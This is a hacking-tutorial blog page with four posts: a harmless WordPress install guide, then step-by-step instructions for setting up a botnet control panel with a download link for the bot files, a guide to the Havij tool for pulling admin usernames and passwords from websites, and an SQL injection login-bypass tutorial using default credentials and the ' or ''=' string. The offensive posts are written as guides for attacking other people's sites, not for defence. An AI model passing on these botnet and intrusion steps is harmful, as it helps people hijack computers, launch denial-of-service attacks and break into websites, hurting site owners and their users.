Showing posts with label Website Hacking. Show all posts
Showing posts with label Website Hacking. Show all posts

Friday, 27 June 2014

INSTALL WORDPRESS BY VIKAS BATTA

     How to install wordpress
Requirement: In order to install the wordpress use must have the following requirement.
    1.    Wordpress setup.
    2.    Xamp server/wamp server.

Note: In order to install the wordpress and Xamp setup downloard the setup from the given links below: http://www.wordpress.org , https://www.apachefriends.org/download.html

   After the installation of the follow the followiunging steps
   1.    Downloard the setup of wordpress from the above  site show as below and extract the file.
     



   2.    Downloard the XAMPP server.


   3.    Now place the wordpress file in XAMP/htdocs
    
            
   4.    Now run the XAMP by typing localhost/wordpress on browser and click on create configuration file.



   5.    After clicking the following window appear click on lets go.

   6.    After that enter the information required as below.

   7.    Now go to Localhost/xammp. And click the phpmy admin.

   8.    After clicking it will take you to the php myadmin. Enter the database name.


   9.    Now fill the following information and click submit.

  10.            After submitting following page will appear and press run.

  11.            After running enter the information and click on install wordpress.


  12.             After that it will take you to the login page which as given        below.


  13.              Entering the username and password it will take you to the wordpress page.

  14.                       Add the plugins to the wordpress in the option provided.


This is how the wordpress is being installed.












Making Your Own Botnet By Vikas Batta

A botnet is a group of computers connected in a coordinated fashion for malicious purposes. Each computer in a botnet is called a bot. These bots form a network of compromised computers, which is controlled by a third party and used to transmit malware or spam, or to launch attacks.

A botnet may also be known as a zombie army.
Originally, botnets were created as a tool with valid purposes in Internet relay chat (IRC) channels. Eventually, hackers exploited the vulnerabilities in IRC networks and developed bots to perform malicious activities such as password theft, keystroke logging, etc.

An attacker will often target computers not safeguarded with firewalls and/or anti-virus software. A botnet manipulator can get control of a computer in a variety of ways, but most frequently does so via viruses or worms. Botnets are significant because they have become tools that both hackers and organized crime use to perform illegal activities online. For example, hackers use botnets to launch coordinated denial-of-service attacks, while organized crime uses botnets as ways to spam, or send a phishing attack that is then used for identify theft. 

Even more concerning is the industry that has sprung up around botnets in which bot herders build botnets specifically to "rent" to the highest bidder. Whether they send spam, adware/spyware, viruses/worms, etc., botnets can be used to perpetrate just about any type of digital attack.

Step 1  :-
              Open the C-panel  of your hosting





Step 2  :-
                Now open the MySQL to create a database

 
Step 3  :-
               After createing the database now open the the PHP MY ADMIN and IMPORT the SQL file.





Step 4  :-
             Now open the FILE MANAGER


Step 5  :-
             Here Upload the file in the PUBLIC.HTML directory
             file's are
           
                              and upload in public.html directory


Step 6  :-
             Now insatll your bot online
             like www.example.com.install/install.php



Step 7  :-
            After the insatllation of bot now Open it with your USER NAME or PASSWORD


Step 8  :-
             After the login you entered in your bot


Step 9  :-
             Now open the REd tube.exe and put the url of your site


Step 10  :-
               Now you can attck  on HTTP site, TCP and UDP services



You can Downlaod all related file from here

https://www.sendspace.com/file/otrwqv

THANKS

Tuesday, 5 November 2013

HOW TO USE HAVIJ TOOL BY VIKAS BATTA

   HAVIJ

     The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective
.

 NOTE :- Havij is a multi tasking tool. with the help of havij we can done many things like
                1. We can also find the admin page
                2. we  can also decrypt the password
                3. MD5 encrypter has in built  in this tool
                4.  mostly havij used for to find the admin username nd paswod

1.1 This is havij interface

 

1.2 Select the find admin if u want to find admin page

 

1.3 Select the MD5 for encryption decryption

 

2.0 How to find admin username & password with havij

2.1 firstly put the address in the address bar and then start or select 'analyze button'

2.2 Now select the 'table'

2.3 Now select " Get Table" to get the tables and select the "columns"

2.4 Now select " get the data"

2.5 Now  here we have a 'username and password' of a particular site




SQL INJECTION BY VIKAS BATTA

1 What is SQL injection ?


    In simple word, It is a code injection technique used to attack data driven applications,
    in which malicious SQL statements are inserted into an entry field for execution.

 1.0  There are two panel of each web site


  1.  first is C-panael
  2.  second is Admin panel                 
         
        Each web site have a two panel one is “C panel” and second we have a “admin panel”.
        Now we cannot BAYPASS the C PANEL , But we can BAYPASS “ADMIN PANEL” with some
        Codes, But firstly we try with admin admin because the mostly administrator keep username and           
        password admin admin, So firstly we try with this , If we successfully enter in the admin panel then its 
        ok otherwise we use some special code like   'or''='

 1.2 This is a C-panel

1.3 This is a admin panel 


1.4 How to find admin page (panel) 

   1  With online website like
       * http://www.y-shahinzadeh.ir/af/
       * http://www.shubshdasyam.com/admin-panel-finder.php
   2  With tool like 
       * Havij
  3   With google dorx like

 

1.5 Now open the admin page (panel)   


   

       Firstly here we enter admin admin in user name and password in the login panel
       If we enter in the admin panel then its ok . otherwise we will use code like ‘or’’=’
       In login panel. With this code surely we enter in the admin panel like this website

  1.6 This is a admin panel

 

Thank you this is all about SQL injection